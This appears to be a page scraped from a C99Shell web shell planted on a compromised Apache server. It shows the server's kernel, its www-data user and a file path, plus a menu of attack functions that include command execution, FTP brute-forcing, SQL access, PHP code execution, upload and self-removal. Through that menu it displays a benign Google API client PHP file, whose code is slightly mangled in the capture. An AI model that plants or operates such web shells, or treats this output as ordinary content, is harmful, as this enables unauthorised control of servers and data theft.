!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache/2.4.41 (Ubuntu). PHP/8.0.30 

uname -a: Linux apirnd 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/var/www/html/main_file/vendor/google/apiclient-services/src/MyBusinessBusinessCalls/Resource/   drwxr-xr-x
Free 13 GB of 57.97 GB (22.43%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     LocationsBusinesscallsinsights.php (3.55 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/*
 * Copyright 2014 Google Inc.
 *
 * Licensed under the Apache License, Version 2.0 (the "License"); you may not
 * use this file except in compliance with the License. You may obtain a copy of
 * the License at
 *
 * http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
 * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
 * License for the specific language governing permissions and limitations under
 * the License.
 */

namespace Google\Service\MyBusinessBusinessCalls\Resource;

use 
Google\Service\MyBusinessBusinessCalls\ListBusinessCallsInsightsResponse;

/**
 * The "businesscallsinsights" collection of methods.
 * Typical usage is:
 *  <code>
 *   $mybusinessbusinesscallsService = new Google\Service\MyBusinessBusinessCalls(...);
 *   $businesscallsinsights = $mybusinessbusinesscallsService->locations_businesscallsinsights;
 *  </code>
 */
class LocationsBusinesscallsinsights extends \Google\Service\Resource
{
  
/**
   * Returns insights for Business calls for a location.
   * (businesscallsinsights.listLocationsBusinesscallsinsights)
   *
   * @param string $parent Required. The parent location to fetch calls insights
   * for. Format: locations/{location_id}
   * @param array $optParams Optional parameters.
   *
   * @opt_param string filter Optional. A filter constraining the calls insights
   * to return. The response includes only entries that match the filter. If the
   * MetricType is not provided, AGGREGATE_COUNT is returned. If no end_date is
   * provided, the last date for which data is available is used. If no start_date
   * is provided, we will default to the first date for which data is available,
   * which is currently 6 months. If start_date is before the date when data is
   * available, data is returned starting from the date when it is available. At
   * this time we support following filters. 1. start_date="DATE" where date is in
   * YYYY-MM-DD format. 2. end_date="DATE" where date is in YYYY-MM-DD format. 3.
   * metric_type=XYZ where XYZ is a valid MetricType. 4. Conjunctions(AND) of all
   * of the above. e.g., "start_date=2021-08-01 AND end_date=2021-08-10 AND
   * metric_type=AGGREGATE_COUNT" The AGGREGATE_COUNT metric_type ignores the DD
   * part of the date.
   * @opt_param int pageSize Optional. The maximum number of BusinessCallsInsights
   * to return. If unspecified, at most 20 will be returned. Some of the
   * metric_types(e.g, AGGREGATE_COUNT) returns a single page. For these metrics,
   * the page_size is ignored.
   * @opt_param string pageToken Optional. A page token, received from a previous
   * `ListBusinessCallsInsights` call. Provide this to retrieve the subsequent
   * page. When paginating, all other parameters provided to
   * `ListBusinessCallsInsights` must match the call that provided the page token.
   * Some of the metric_types (e.g, AGGREGATE_COUNT) returns a single page. For
   * these metrics, the pake_token is ignored.
   * @return ListBusinessCallsInsightsResponse
   */
  
public function listLocationsBusinesscallsinsights($parent$optParams = [])
  {
    
$params = ['parent' => $parent];
    
$params array_merge($params$optParams);
    return 
$this->call('list', [$params], ListBusinessCallsInsightsResponse::class);
  }
}

// Adding a class alias for backwards compatibility with the previous class name.
class_alias(LocationsBusinesscallsinsights::class, 'Google_Service_MyBusinessBusinessCalls_Resource_LocationsBusinesscallsinsights');

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.006 ]--